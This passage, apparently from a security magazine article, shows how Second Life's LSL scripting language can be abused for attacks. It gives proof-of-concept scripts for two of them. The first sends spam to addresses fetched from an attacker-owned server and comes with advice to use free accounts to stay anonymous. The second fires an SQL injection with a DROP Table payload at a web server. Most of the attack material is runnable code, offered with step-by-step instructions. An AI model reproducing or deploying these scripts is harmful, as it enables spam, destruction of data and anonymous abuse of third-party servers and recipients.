We started with a small script to send spam mails. The required steps are quite easy, we need a list of recipients and we must be able to send emails, so: 1. Create text file with email addresses and put it on a web server that you own. 2. Download the file with LSL llHTTPRequest within SL and parse the response.
3. Send Spam to each email address using llEmail. The emails are sent from your Second Life account but of course you can use free accounts within Second Life to stay anonymous. Here!s a basic Proof of Concept Spam Script:
default { state_entry() { http_request_id=llHTTPRequest(URL+"/sldemo.txt", [HTTP_METHOD, "GET"],""); } touch_start(integer total_number) { for(; i<llGetListLength(my_list)+1; ++i){ llEmail(llList2String(my_list,i),"SL Spam","Mine is longer than yours ;-)"); } } http_response(key request_id,integer status,list metadata,string body) { if ( request_id == http_request_id ) { my_list = llParseString2List(body,[";"],[]); } } }
Sending spams is feasible, but a real attack would be much more nicer. SQL Injections attacks are done via web requests against form fields or query parameters. We can send web requests with the function llHTTPRequest, so
we can do real web attacks as long as they are not filtered on the Linden Lab servers. Here!s another small sample script for a SQL Injection attack:
default { state_entry() { http_request_id=llHTTPRequest(URL+"/sldemo.aspx?user=sldemo';DROP Table;--", [HTTP_METHOD, "GET"],""); } touch_start(integer total_number)
{
llSay(0,"Web server owned!"); } http_response(key request_id,integer status,list metadata,string body) { } }
www.insecuremag.com
31